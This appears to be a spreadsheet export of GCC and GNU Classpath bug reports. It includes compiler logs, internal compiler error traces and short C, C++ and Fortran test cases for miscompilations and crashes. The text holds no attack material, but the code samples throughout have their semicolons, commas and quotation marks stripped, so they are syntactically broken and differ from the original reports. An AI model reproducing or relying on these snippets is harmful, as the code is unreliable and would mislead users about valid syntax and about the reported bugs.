 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__PRAGMA_REDEFINE_EXTNAME -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D_XOPEN_SOURCE=500 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -D__EXTENSIONS__ -D__SIZE_TYPE__=long unsigned int -D__PTRDIFF_TYPE__=long int -D__WCHAR_TYPE__=int -D__WINT_TYPE__=int -D__arch64__ -Acpu=sparc64 -Amachine=sparcv9 -D__sparcv9 optfoo.cc -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase optfoo.cc -O2 -Wall -version -o /var/tmp//ccWZmCh0.s
GNU CPP version 3.1 (cpplib) (sparc ELF)
GNU C++ version 3.1 (sparc64-sun-solaris2.8)
        compiled by GNU C version 3.1.
ignoring nonexistent directory /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/sparc64-sun-solaris2.8/include
#include ... search starts here:
#include  search starts here:
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/include/g++-v3
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/include/g++-v3/sparc64-sun-solaris2.8
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/include/g++-v3/backward
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/include
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/include
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/sparc64-sun-solaris2.8/sys-include
End of search list.
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/../../../../sparc64-sun-solaris2.8/bin/as -V -Qy -s -64 -Av9 -o /var/tmp//cc1scFwK.o /var/tmp//ccWZmCh0.s
GNU assembler version 2.11.2 (sparc64-sun-solaris2.8) using BFD version 2.11.2
 /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/collect2 -V -Y P/usr/lib/sparcv9 -Qy -o optfoo /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/crt1.o /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/crti.o /usr/lib/sparcv9/values-Xa.o /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/crtbegin.o -L/opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1 -L/opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/../../../../sparc64-sun-solaris2.8/lib /var/tmp//cc1scFwK.o -lstdc++ -lm -lgcc -lc -lgcc -lc /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/crtend.o /opt/gcc-3.1-cross-sparc64-sun-solaris2.8/lib/gcc-lib/sparc64-sun-solaris2.8/3.1/crtn.o
GNU ld version 2.11.2 (with BFD 2.11.2)
  Supported emulations:
   elf64_sparc
   elf32_sparc
[ - - - ]
The expected output is of the form (the first pointer value is understandably different):
netra-1:~$ /starbug/spencer/optfoo 
*** begin: [0xffffffff7ffff9cf 0 0] end: [0xabcd 123456 1]
Not equal
Here is a -O2 compiled version being run on a sparc64-sun-solaris2.8 box:
netra-1:~$ /starbug/spencer/optfoo 
*** begin: [0xffffffff7ffff9cf 0 0] end: [0xabcd 0 0]
equal
The begin object is usually right during the failure but the end object is always incorrect.  As is suggested by the code comments turning off -O2 or removing the two const qualifiers on Container::iterator's members avoids this bug.
I suspect that this is the return value optimization acting up.  I could not find a compiler option to turn off just this optimization.
Release:
gcc-3.1 and gcc-3.1.1
Environment:
sparc64-sun-solaris2.8
How-To-Repeat:
See description.</t>
  </si>
  <si>
    <t>GCC-16808</t>
  </si>
  <si>
    <t>[4.0 Regression] verify_ssa failed: Missing definition for SSA_NAME</t>
  </si>
  <si>
    <t>This is a test case from PR 11372 but most likely it's a different problem
this time.
% gcc -c -O2 pr11372.c   
pr11372.c: In function `evalTerm':
pr11372.c:25: error: Missing definition
for SSA_NAME: TMT.14_26
in statement:
#   TMT.14_28 = V_MAY_DEF _26&gt;
#   TMT.15_29 = V_MAY_DEF _27&gt;
f (T.6_12)
pr11372.c:25: error: Missing definition
for SSA_NAME: TMT.15_27
in statement:
#   TMT.14_28 = V_MAY_DEF _26&gt;
#   TMT.15_29 = V_MAY_DEF _27&gt;
f (T.6_12)
pr11372.c:25: internal compiler error: verify_ssa failed.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6087</t>
  </si>
  <si>
    <t>3.1 i86 FP stack pop bug</t>
  </si>
  <si>
    <t>The code below executes incorrectly.
Here's what i get:
$ g++ -O0 -o x x.cc y.cc
$ ./x
25.000000
25.000000
25.000000
25.000000
nan
nan
What's happening is that the CftRibbon() constructor
is not properly popping the result of foobar5() off the FP stack.
The stack eventually fills up and we start getting nan's resulting
from FP operations.
Here's the generated code for the call to foobar5():
.LEHB0:
        call    _Z7foobar5v
.LEHE0:
        fld     %st(0)
        jmp     .L1
Instead of popping the returned value this duplicates it.
Release:
3.1 20020326 (prerelease)
Environment:
System: Linux karma 2.4.9-13 #1 Tue Oct 30 20:11:04 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix --enable-long-long --enable-languages=cc++f77
How-To-Repeat:
Compile and link together these two sources.
-- x.cc ----------------------------------------------------------
struct d0om_Registerable
{
  virtual ~d0om_Registerable () {}
}
struct CftRibbon : public d0om_Registerable
{
  CftRibbon ()
}
double foobar5 ()
CftRibbon::CftRibbon ()
{
  foobar5()
}
int main ()
{
  new CftRibbon
  new CftRibbon
  new CftRibbon
  new CftRibbon
  new CftRibbon
  new CftRibbon
  return 0
}
-- y.cc ----------------------------------------------------------
extern C int printf(...)
double x = 3
double y = 4
double foobar5 ()
{
  double z = x*x+y*y
  printf (%lf\n z)
  return z
}
------------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-2919</t>
  </si>
  <si>
    <t>-fno-omit-frame-pointer breaks library</t>
  </si>
  <si>
    <t>I configured ss-20010521 with
--enable-debug --enable-cxx-flags='-fno-omit-frame-pointer'
As a result the inlined functions in standard header
files like cstring are not included in the library.
This results in total failure to compile a C++ program
with errors like:
~/c++/libcw/src/libcwd&gt;g++-3.0 -v test.cc
Reading specs from /usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: /usr/src/gcc/gcc-cvs-3.0/configure --prefix=/usr/local/gcc-3.0 --enable-shared --with-gnu-as --with-gnu-ld --enable-languages=c++ --enable-debug --enable-cxx-flags=-fno-omit-frame-pointer
Thread model: single
gcc version 3.0 20010521 (prerelease)
 /usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ test.cc -D__GNUG__=3 -D_GNU_SOURCE -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase test.cc -version -o /tmp/ccNxRiXV.s
GNU CPP version 3.0 20010521 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0 20010521 (prerelease) (i686-pc-linux-gnu)
        compiled by GNU C version 3.0 20010521 (prerelease).
ignoring nonexistent directory /usr/local/gcc-3.0/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/gcc-3.0/include/g++-v3
 /usr/local/gcc-3.0/include/g++-v3/i686-pc-linux-gnu
 /usr/local/gcc-3.0/include/g++-v3/backward
 /usr/local/include
 /usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/include
 /usr/include
End of search list.
 as --traditional-format -V -Qy -o /tmp/ccwrjp9A.o /tmp/ccNxRiXV.s
GNU assembler version 2.10.91 (i386-redhat-linux) using BFD version 2.10.91.0.2
 /usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 /usr/lib/crt1.o /usr/lib/crti.o /usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/crtbegin.o -L/usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0 -L/usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/../../.. -rpath /usr/local/gcc-3.0/lib: /tmp/ccwrjp9A.o -lstdc++ -lm -lgcc_s -lc -lgcc_s /usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/crtend.o /usr/lib/crtn.o
/usr/local/gcc-3.0/lib/gcc-lib/i686-pc-linux-gnu/3.0/../../../libstdc++.so: undefined reference to `std::strchr(char const* int)'
collect2: ld returned 1 exit status
When also -fkeep-inline-functions is used in --enable-cxx-flags
then things work again.  No idea what would be a good way to fix
this though.
Release:
ss-20010521</t>
  </si>
  <si>
    <t>GCC-50906</t>
  </si>
  <si>
    <t>e500 exception unwinding under -Os causes SIGSEGV</t>
  </si>
  <si>
    <t>Created attachment 25649
Test case part 1
The libffi test-suite is failing on an e500v2 build of GCC 4.6.1 with a segmentation fault in libgcc (called from throw() in the unwindtest.cc file).
The target GCC configure options:
  --build/--host/--target=powerpc-linux-gnuspe
  --with-cpu=8548
  --enable-e500_double
  --with-long-double-128
I have extracted it to the attached minimal test-case compiled as follows:
  $ g++ -Wall -Wextra -Werror -ggdb3 -Os -c unwindtest.cc -o unwindtest.o
  $ g++ -Wall -Wextra -Werror -ggdb3 -Os -c unwindtestfunc.cc -o unwindtestfunc.o
  $ g++ -ggdb3 -Os -o unwindtest unwindtest.o unwindtestfunc.o
The test fails if unwindtestfunc.cc is built with -Os but not if it is built with -O2.  The compile options for unwindtest.cc have no effect on the success or failure of the test.
Cheers
Kyle Moffett
--
Curious about my work on the Debian powerpcspe port?
I'm keeping a blog here: http://pureperl.blogspot.com/</t>
  </si>
  <si>
    <t>kyle+new</t>
  </si>
  <si>
    <t>GCC-78101</t>
  </si>
  <si>
    <t>PowerPC 64-bit little endian fusion failure with -O3 -mcpu=power9</t>
  </si>
  <si>
    <t>If you compile kit 102 of the Spec 2017 benchmark suite for a base run using the options: -O3 -mcpu=power9 it fails in both the 527.cam4_r and 627.cam4_s benchmarks with an insn not found error.  If you use the -mno-power9-fusion switch it will compile fine.
cldwat2m_macro.fppized.f90:1101:0:
    end subroutine mmacro_pcond
Error: insn does not satisfy its constraints:
(insn 34030 2826 2832 309 (parallel [
            (set (mem:DF (plus:DI (plus:DI (reg:DI 3 3 [4385])
                            (const_int 65536 [0x10000]))
                        (const_int -5632 [0xffffffffffffea00])) [2 qmin1 S8 A64])
                (unspec:DF [
                        (reg:DF 5 5 [orig:1781 _4839 ] [1781])
                    ] UNSPEC_FUSION_P9))
            (clobber (reg:DI 3 3 [4387]))
        ]) cldwat2m_macro.fppized.f90:608 797 {fusion_gpr_di_df_store}
     (nil))
cldwat2m_macro.fppized.f90:1101:0: internal compiler error: in extract_constrain_insn at recog.c:2213
0x108a0f53 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /home/meissner/fsf-src/trunk/gcc/rtl-error.c:108
0x108a0fb7 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /home/meissner/fsf-src/trunk/gcc/rtl-error.c:119
0x10867717 extract_constrain_insn(rtx_insn*)
        /home/meissner/fsf-src/trunk/gcc/recog.c:2213
0x1086c96f copyprop_hardreg_forward_1
        /home/meissner/fsf-src/trunk/gcc/regcprop.c:794
0x1086da97 execute
        /home/meissner/fsf-src/trunk/gcc/regcprop.c:1301
Please submit a full bug report
with preprocessed source if appropriate.
I'm not sure I can add an attachment for the bug since spec 2017 is not released at this point.</t>
  </si>
  <si>
    <t>GCC-657</t>
  </si>
  <si>
    <t>ICE on parsing compare (inside if/while statement)</t>
  </si>
  <si>
    <t>An ICE occurs when parsing an illegal syntaxed compare inside a if or while statement
OUTPUT of compiler:
$ gcc -v -save-temps -c ICE122.cc
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ ICE122.cc ICE122.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/g++-3
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus ICE122.ii -quiet -dumpbase ICE122.cc -version -o ICE122.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
ICE122.cc: In function `void test ()':
ICE122.cc:4: parse error before `)'
ICE122.cc:5: Internal error #122.
ICE122.cc:5: Internal compiler error in finish_function at
../gcc/cp/decl.c:14422
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Linux version 2.2.16-22
How-To-Repeat:
void test() {
  int blah
  if (blah blah) // Illegal syntaxed compare
}</t>
  </si>
  <si>
    <t>CLASSPATH-28693</t>
  </si>
  <si>
    <t>JSplitPane oneTouchExpandable issues</t>
  </si>
  <si>
    <t>Several of my test apps use JSplitPane with oneTouchExpandable(true).
In this case the divider looks bad because only one of the out touch
arrows is rendered (the JDK uses two arrows) and even the one arrow
is partly out-of-bounds. Also clicking at or near the out touch arrow
does nothing.
See attached testcase. The performance of the JTextArea is still very
bad so use cntl-A (select-all) and DEL first to clear the textarea 
before playing with the splitpane dividers.</t>
  </si>
  <si>
    <t>GCC-674</t>
  </si>
  <si>
    <t>-omagic and -o magic have different effects</t>
  </si>
  <si>
    <t>anthonyu@original:~/dentist-0.7[1]$ ls magic a.out
/bin/ls: magic: No such file or directory
/bin/ls: a.out: No such file or directory
anthonyu@original:~/dentist-0.7[1]$ gcc -omagic magic.c
anthonyu@original:~/dentist-0.7[0]$ ls magic a.out
/bin/ls: magic: No such file or directory
a.out*
anthonyu@original:~/dentist-0.7[1]$ rm a.out 
anthonyu@original:~/dentist-0.7[0]$ gcc -o magic magic.c
anthonyu@original:~/dentist-0.7[0]$ ls magic a.out
/bin/ls: a.out: No such file or directory
magic*
Release:
2.95.1
Environment:
i586-pc-linux-gnu
How-To-Repeat:
-omagic and/or -o magic</t>
  </si>
  <si>
    <t>anthonyu</t>
  </si>
  <si>
    <t>GCC-4160</t>
  </si>
  <si>
    <t>unknown opcode .subsection</t>
  </si>
  <si>
    <t>error msg:
make
gcc -g -O2 -D_REENTRANT -Wall -D__EXTENSIONS__  -c  gai_strerror.c
/usr/ccs/bin/as: /var/tmp/ccnk7G5t.s line 584: error: unknown opcode .subsection
/usr/ccs/bin/as: /var/tmp/ccnk7G5t.s line 584: error: statement syntax
/usr/ccs/bin/as: /var/tmp/ccnk7G5t.s line 598: error: unknown opcode .previous
/usr/ccs/bin/as: /var/tmp/ccnk7G5t.s line 598: error: statement syntax
*** Error code 1
make: Fatal error: Command failed for target `gai_strerror.o'
Release:
gcc3.0.1
Environment:
Sun Sparc Solaris 8
(SunOS 5.8 sparc SUNW)</t>
  </si>
  <si>
    <t>stefan_m5</t>
  </si>
  <si>
    <t>GCC-43017</t>
  </si>
  <si>
    <t>[4.5 Regression] VRP miscompiles python with -fwrapv II</t>
  </si>
  <si>
    <t>Another one.
signed char foo(unsigned char c2)
{
  signed char c2_22
  if (c2 &lt;= 63 || c2 == 127)
    goto bb43
  else
    goto bb20
bb20:
  if (c2 &gt; 252)
    goto bb43
  else
    goto bb21
bb21:
  /*...*/
bb24:
  c2_22 = (signed char)c2
  if (c2_22 &gt;= 0)
    goto bb25
  else
    goto bb26
bb25:
  c2 = (unsigned char)(c2_22 - 64)
  goto bb27
bb26:
  c2 = (unsigned char)(c2_22 - 65)
bb27:
  if (c2 &lt;= 93)
    goto bb28
  else
    goto bb29
bb28:
  c2 = c2 + 33
  goto bb30
bb29:
  c2 = (unsigned char)((signed char)c2 - 61)
bb30:
  return c2
bb43:
  return -1
}
extern void abort (void)
int main()
{
  signed char res[256] = {
      -1 -1 -1 -1 -1 -1 -1 -1
      -1 -1 -1 -1 -1 -1 -1 -1
      -1 -1 -1 -1 -1 -1 -1 -1
      -1 -1 -1 -1 -1 -1 -1 -1
      -1 -1 -1 -1 -1 -1 -1 -1
      -1 -1 -1 -1 -1 -1 -1 -1
      -1 -1 -1 -1 -1 -1 -1 -1
      -1 -1 -1 -1 -1 -1 -1 -1
      33 34 35 36 37 38 39 40
      41 42 43 44 45 46 47 48
      49 50 51 52 53 54 55 56
      57 58 59 60 61 62 63 64
      65 66 67 68 69 70 71 72
      73 74 75 76 77 78 79 80
      81 82 83 84 85 86 87 88
      89 90 91 92 93 94 95 -1
      96 97 98 99 100 101 102 103
      104 105 106 107 108 109 110 111
      112 113 114 115 116 117 118 119
      120 121 122 123 124 125 126 33
      34 35 36 37 38 39 40 41
      42 43 44 45 46 47 48 49
      50 51 52 53 54 55 56 57
      58 59 60 61 62 63 64 65
      66 67 68 69 70 71 72 73
      74 75 76 77 78 79 80 81
      82 83 84 85 86 87 88 89
      90 91 92 93 94 95 96 97
      98 99 100 101 102 103 104 105
      106 107 108 109 110 111 112 113
      114 115 116 117 118 119 120 121
      122 123 124 125 126 -1 -1 -1
  }
  unsigned int c
  for (c = 0 c &lt;= 255 ++c)
    {
      if (foo (c) != res[c])
        abort ()
    }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-27496</t>
  </si>
  <si>
    <t>ICE on broken templated friend</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 3.0:
===================================
template struct A
{
    template friend class X
}
A a
===================================
bug.cc:3: error: 'void' is not a valid type for a template constant parameter
bug.cc: In instantiation of 'A':
bug.cc:6:   instantiated from here
bug.cc:3: error: 'void' is not a valid type for a template constant parameter
bug.cc:3: internal compiler error: tree check: expected tree that contains 'decl common' structure have 'error_mark'  in tsubst_friend_class at cp/pt.c:5443
Please submit a full bug report [etc.]
GCC 2.95.3 wrongly accepted the code.</t>
  </si>
  <si>
    <t>GCC-30746</t>
  </si>
  <si>
    <t>50th Anniversary Bug - Forward reference to contained function</t>
  </si>
  <si>
    <t>Malcolm Cohen's talk to the BCS 50th anniversary of FORTRAN meeting has this example:
MODULE m
  REAL :: x(3) = (/ 1.5 2.5 3.5 /)
CONTAINS
  SUBROUTINE s
    CALL inner
  CONTAINS
    SUBROUTINE inner
      PRINT *x(7) ! This is not an error!
    END SUBROUTINE
    FUNCTION x(n)
      x = REAL(n)**n
    END FUNCTION
  END SUBROUTINE
END MODULE
  use m
  call s()
end
to which gfortran incorrectly returns
      PRINT *x(7) ! This is not an error!
               1
Warning: Array reference at (1) is out of bounds
unless subroutine inner and function x are interchanged.
Paul</t>
  </si>
  <si>
    <t>GCC-3193</t>
  </si>
  <si>
    <t>-G vs ( -shared or -symbolic )</t>
  </si>
  <si>
    <t>//fun2.cpp
#include 
class A{
public:
	static int funwithaverylongnamesothaticanseeitinthenmlisting( int c ) {
		cout  A::fun &lt;&lt; endl
		return c - 20
	}
}
int fun( int a ) {
	cout  ::fun &lt;&lt; endl
	return a * 20 
}
/************************************************/
Compile the above file with the following options
 g++ -G fun2.cpp -o fun2.so
   ok. compiles and gives the shared object file
 g++ -shared fun2.cpp -o fun2.so
   not ok. kaput!
 g++ -symbolic fun2.cpp -o fun2.so
   not ok. kaput!! once again
what's happening?
Release:
2.95.3
Environment:
SunOS HOSTNAME 5.6 Generic_105181-17 sun4u sparc SUNWUltra-250</t>
  </si>
  <si>
    <t>kusi_news</t>
  </si>
  <si>
    <t>GCC-8557</t>
  </si>
  <si>
    <t>[3.3 regression] error reporting routines re-entered</t>
  </si>
  <si>
    <t>I get an internal compiler error when compiling binutils-2.13.1 on a i686-pc-linux-gnu host for a powerpc-eabi target. The error occurs at all optimization levels greater than 0 but goes away if -O0 is used.
Compiler output below preprocessed source code attached.
-----
~/cross-devel/powerpc-eabi/binutils-2.13.1/gas $ /opt/gcc/bin/gcc -v -save-temps -DHAVE_CONFIG_H -I. -I/home/thomas/src/gnu/binutils-2.13.1/gas -I. -D_GNU_SOURCE -I. -I/home/thomas/src/gnu/binutils-2.13.1/gas -I../bfd -I/home/thomas/src/gnu/binutils-2.13.1/gas/config -I/home/thomas/src/gnu/binutils-2.13.1/gas/../include -I/home/thomas/src/gnu/binutils-2.13.1/gas/.. -I/home/thomas/src/gnu/binutils-2.13.1/gas/../bfd -I/home/thomas/src/gnu/binutils-2.13.1/gas/../intl -I../intl -DLOCALEDIR=\/tools/share/locale\   -W -Wall -Wstrict-prototypes -Wmissing-prototypes -pipe -O3 -march=athlon -fomit-frame-pointer -c /home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c
gcc: warning: -pipe ignored because -save-temps specified
Reading specs from /opt/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: /home/thomas/src/gnu/gcc-3.2/configure --prefix=/opt/gcc --with-gnu-as --with-gnu-ld --enable-threads=posix --enable-languages=cc++ --with-system-zlib
Thread model: posix
gcc version 3.2
 /opt/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/cpp0 -lang-c -v -I. -I/home/thomas/src/gnu/binutils-2.13.1/gas -I. -I. -I/home/thomas/src/gnu/binutils-2.13.1/gas -I../bfd -I/home/thomas/src/gnu/binutils-2.13.1/gas/config -I/home/thomas/src/gnu/binutils-2.13.1/gas/../include -I/home/thomas/src/gnu/binutils-2.13.1/gas/.. -I/home/thomas/src/gnu/binutils-2.13.1/gas/../bfd -I/home/thomas/src/gnu/binutils-2.13.1/gas/../intl -I../intl -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__athlon -D__athlon__ -D__tune_athlon__ -D__MMX__ -D__3dNOW__ -D__3dNOW_A__ -DHAVE_CONFIG_H -D_GNU_SOURCE -DLOCALEDIR=/tools/share/locale /home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c -W -Wall -Wstrict-prototypes -Wmissing-prototypes tc-ppc.i
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /opt/gcc/i686-pc-linux-gnu/include
ignoring duplicate directory .
ignoring duplicate directory .
ignoring duplicate directory /home/thomas/src/gnu/binutils-2.13.1/gas
#include ... search starts here:
#include  search starts here:
 .
 /home/thomas/src/gnu/binutils-2.13.1/gas
 ../bfd
 /home/thomas/src/gnu/binutils-2.13.1/gas/config
 /home/thomas/src/gnu/binutils-2.13.1/include
 /home/thomas/src/gnu/binutils-2.13.1
 /home/thomas/src/gnu/binutils-2.13.1/bfd
 /home/thomas/src/gnu/binutils-2.13.1/intl
 ../intl
 /opt/gnome/include
 /opt/DB/include
 /usr/X11/include
 /opt/gcc/include
 /opt/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/include
 /usr/include
End of search list.
 /opt/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/cc1 -fpreprocessed tc-ppc.i -quiet -dumpbase tc-ppc.c -march=athlon -O3 -W -Wall -Wstrict-prototypes -Wmissing-prototypes -version -fomit-frame-pointer -o tc-ppc.s
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
GNU C version 3.2 (i686-pc-linux-gnu)
        compiled by GNU C version 3.2.
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c: In function `md_assemble':
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2188: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2190: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2195: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2197: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2202: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2204: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2209: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:2211: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c: In function `md_apply_fix3':
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:5404: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:5411: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:5418: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:5425: warning: right shift count &gt;= width of type
/home/thomas/src/gnu/binutils-2.13.1/gas/config/tc-ppc.c:5553: Internal compiler error in simplify_subreg at simplify-rtx.c:2452
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
unknown
Environment:
i686-pc-linux-gnu kernel 2.4.19 glibc 2.2.5</t>
  </si>
  <si>
    <t>GCC-57850</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] Option -fdump-translation-unit not working</t>
  </si>
  <si>
    <t>Hi
The -fdump-translation-unit option of the GCC compiler was broken in 4.8.1 (relative to 4.7.1).
Steps to reproduce:
1. Create any header file file.h
2. g++ -fdump-translation-unit file.h
g++ 4.7.1 dumps test.h.001t.tu but g++ 4.8.1 does nothing.
May be this bug can be fixed like http://gcc.gnu.org/bugzilla/show_bug.cgi?id=55164 ?
Thank you.</t>
  </si>
  <si>
    <t>aponomarenko</t>
  </si>
  <si>
    <t>GCC-43381</t>
  </si>
  <si>
    <t>[4.4 Regression] infinite loop in gcc.dg/parm-impl-decl-1.c with -g</t>
  </si>
  <si>
    <t>When compiling gcc.dg/parm-impl-decl-1.c with -g there seems to be an infinite loop in gen_decl_die.  This is present in 4.4.2 on my workstation as well as on trunk.</t>
  </si>
  <si>
    <t>GCC-83874</t>
  </si>
  <si>
    <t>[6/7/8 Regression] ICE initializing character array from derived type</t>
  </si>
  <si>
    <t>The following works up to 5.0.0 but crashes with 6.0.0 through 8.0-trunk:
program gfcbug146
  implicit none
  type t
     character(len=1) :: name
  end type t
  type(t) parameter :: z(2)= [ t ('a') t ('b') ]
! character(len=1) parameter :: names(*) = z% name   ! works
  character(len=*) parameter :: names(2) = z% name   ! ICE
! character(len=*) parameter :: names(*) = z% name   ! ICE
end program gfcbug146
% gfc-8 gfcbug146.f90
f951: internal compiler error: Segmentation fault
0x89a4680 crash_signal
        ../../trunk/gcc/toplev.c:325
0x82ce89a add_init_expr_to_sym
        ../../trunk/gcc/fortran/decl.c:1724
0x82d996c variable_decl
        ../../trunk/gcc/fortran/decl.c:2589
0x82d996c gfc_match_data_decl()
        ../../trunk/gcc/fortran/decl.c:5698
0x833a021 match_word
        ../../trunk/gcc/fortran/parse.c:65
0x833a021 match_word
        ../../trunk/gcc/fortran/parse.c:54
0x833cb81 decode_statement
        ../../trunk/gcc/fortran/parse.c:376
0x833cb81 decode_statement
        ../../trunk/gcc/fortran/parse.c:295
0x833e34c next_free
        ../../trunk/gcc/fortran/parse.c:1226
0x833e34c next_statement
        ../../trunk/gcc/fortran/parse.c:1458
0x833fb9f parse_spec
        ../../trunk/gcc/fortran/parse.c:3836
0x8341bc3 parse_progunit
        ../../trunk/gcc/fortran/parse.c:5649
0x8342ecb gfc_parse_file()
        ../../trunk/gcc/fortran/parse.c:6189
0x838b8ae gfc_be_parse_file
        ../../trunk/gcc/fortran/f95-lang.c:204
Please submit a full bug report
